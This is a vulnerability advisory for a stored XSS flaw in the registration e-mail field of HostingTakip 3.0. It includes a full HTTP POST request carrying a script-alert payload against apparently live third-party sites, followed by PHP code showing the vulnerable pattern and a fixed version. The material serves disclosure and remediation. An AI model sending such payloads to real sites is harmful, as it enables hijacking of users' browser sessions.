HostingTakip 3.0 Cross Site Scripting

2015-03-13T00:00:00
ID PACKETSTORM:130821
Type packetstorm
Reporter KnocKout
Modified 2015-03-13T00:00:00

Description

`HostingTakip v3.0 - Stored XSS Vulnerability  
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Discovered by: KnocKout  
[~] Contact : knockout@e-mail.com.tr  
[~] HomePage : http://h4x0resec.blogspot.com  
Love to _UnDeRTaKeR_ & BARCOD3 & Septemb0x & ZoRLu ( milw00rm.com )  
############################################################  
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
|~Web App. : HostingTakip  
|~Affected Version : v3.0   
|~Software : http://www.hostingtakip.com & http://wmscripti.com/php-scriptler/hostingtakip-hosting-yonetim-scripti.html  
|~Official Demo : http://hostingtakip.teknoder.com/demo/  
|~RISK : Medium  
|~Tested On : [L] Windows 7, Mozilla Firefox  
####################INFO################################  
An XSS payload can be executed through the registration form.  
Click "Yeni Müşteri" (New Customer): the e-mail field there is not filtered.  
Any payload entered into it is stored and will execute on "uye-duzenle.php".  
########################################################  
Tested on:  
http://www.ayashosting.com  
http://www.oneritasarim.com/hostingtakip/  
----------------------------------------------------------  
Proof image: http://i.hizliresim.com/mGZzQ8.png  
----------------------------------------------------------  
Request  
----------------------------------------------------------  
POST http://www.oneritasarim.com/hostingtakip/kayit_tamamla.php   
Request Headers:  
Host[www.oneritasarim.com]  
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0]  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]  
Accept-Language[tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3]  
Accept-Encoding[gzip, deflate]  
Referer[http://www.oneritasarim.com/hostingtakip/y_kullanici.php]  
Cookie[PHPSESSID=1b4b474c7fc50e0885aae61274ac0b55; __utma=221857094.828791546.1426246879.1426246879.1426246879.1; __utmc=221857094; __utmz=221857094.1426246879.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)]  
Connection[keep-alive]  
Post Data:  
kadi[%3C%2Fscript%3E%3Cscript%3Ealert%28%27h4+Here%27%29%3C%2Fscript%3E]  
posta[%3C%2Fscript%3E%3Cscript%3Ealert%28%27h4+Here%27%29%3C%2Fscript%3E]  
sifre[123456]  
ad[123456]  
tc[012345678901]  
tel[12345678901]  
mustip[b]  
sehir[h4]  
ilce[h4]  
adres[h4x0resec.blogspot.com]  
hakkimda[h4]  
guv[1b4b47]  
B1[G%F6nder]  
Response Headers:  
Content-Encoding[gzip]  
Vary[Accept-Encoding]  
Date[Fri, 13 Mar 2015 12:18:10 GMT]  
Server[LiteSpeed]  
Connection[close]  
Expires[Thu, 19 Nov 1981 08:52:00 GMT]  
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]  
Pragma[no-cache]  
Content-Type[text/html]  
Content-Length[143]  
`
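As an added illustration of the fix the advisory implies (not HostingTakip's own code), here is the unfiltered pattern beside a hardened version that validates the e-mail field on input and HTML-encodes it on output. The field name `posta` and the payload come from the request above; the function names and the assumption that the value is echoed back into an input element are mine.

```php
<?php
// Added example, not HostingTakip's own code. Field name "posta" is taken
// from the advisory's POST data; the rendering context is assumed.

// --- Vulnerable pattern: the stored e-mail value is echoed unfiltered, so a
// payload accepted by kayit_tamamla.php is rendered as markup on uye-duzenle.php.
function renderEmailUnsafe(string $storedPosta): string {
    return '<input type="text" name="posta" value="' . $storedPosta . '">';
}

// --- Hardened part 1: validate on input (registration side).
// Returns the address, or null when the value is not a syntactically valid e-mail.
function validatePosta(string $raw): ?string {
    $raw = trim($raw);
    if (mb_strlen($raw, 'UTF-8') > 254) {   // RFC 5321 practical upper bound
        return null;
    }
    $email = filter_var($raw, FILTER_VALIDATE_EMAIL);
    return $email === false ? null : $email;
}

// --- Hardened part 2: encode on output (edit-page side).
// This is the defence that still holds if validation is bypassed or the row was
// written through another path (import, admin edit, direct DB change).
function e(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderEmailSafe(string $storedPosta): string {
    return '<input type="text" name="posta" value="' . e($storedPosta) . '">';
}

// Demonstration using the URL-encoded "posta" value from the advisory's request.
$posted = urldecode('%3C%2Fscript%3E%3Cscript%3Ealert%28%27h4+Here%27%29%3C%2Fscript%3E');

var_dump(validatePosta($posted));           // NULL: rejected at registration time
echo renderEmailSafe($posted), PHP_EOL;     // tags arrive as &lt;/script&gt;... text
echo renderEmailUnsafe($posted), PHP_EOL;   // tags reach the page unchanged
```

Validation alone is not sufficient: a value that passes `FILTER_VALIDATE_EMAIL` can still contain characters that matter in other contexts, so the output encoding step belongs on every page that prints the field.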